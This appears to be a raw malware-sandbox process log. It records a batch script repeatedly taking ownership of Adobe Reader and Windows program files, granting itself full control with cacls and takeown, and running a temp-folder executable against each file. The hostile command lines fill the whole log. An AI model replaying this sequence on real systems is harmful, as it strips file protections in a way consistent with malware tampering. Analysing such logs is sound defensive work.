C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵
- Modifies file permissions
PID:1576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "SY______.PFM" -nobanner3⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "SY______.PFM" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:948
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "brt55.ths" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "brt55.ths" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
PID:744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "engphon.env" -nobanner3⤵PID:952
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "engphon.env" -nobanner4⤵PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:1368
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵
- Modifies file permissions
PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:676
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:1240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵
- Modifies file permissions
PID:568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:524
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵
- Modifies file permissions
PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "end_review.gif" -nobanner3⤵PID:744
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "end_review.gif" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "pdf.gif" -nobanner3⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "pdf.gif" -nobanner4⤵PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵
- Modifies file permissions
PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "review_shared.gif" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "review_shared.gif" -nobanner4⤵PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "tr.gif" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "tr.gif" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Identity-H" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Identity-H" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵PID:676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵
- Modifies file permissions
PID:700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "zx______.pfm" -nobanner3⤵PID:280
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "zx______.pfm" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:1920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵
- Modifies file permissions
PID:756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:1156
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵PID:1520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵PID:1080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "blank.jtp" -nobanner3⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "blank.jtp" -nobanner4⤵PID:896
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "can.fca" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "can.fca" -nobanner4⤵PID:1512
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵PID:756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵
- Modifies file permissions
PID:1368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Seyes.jtp" -nobanner3⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Seyes.jtp" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1896
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1520
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "eula.ini" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "eula.ini" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:1368
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "create_form.gif" -nobanner3⤵PID:568
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "create_form.gif" -nobanner4⤵PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "forms_super.gif" -nobanner3⤵PID:280
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "forms_super.gif" -nobanner4⤵PID:1032
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵
- Modifies file permissions
PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1156
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:1224
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:1644
-
-
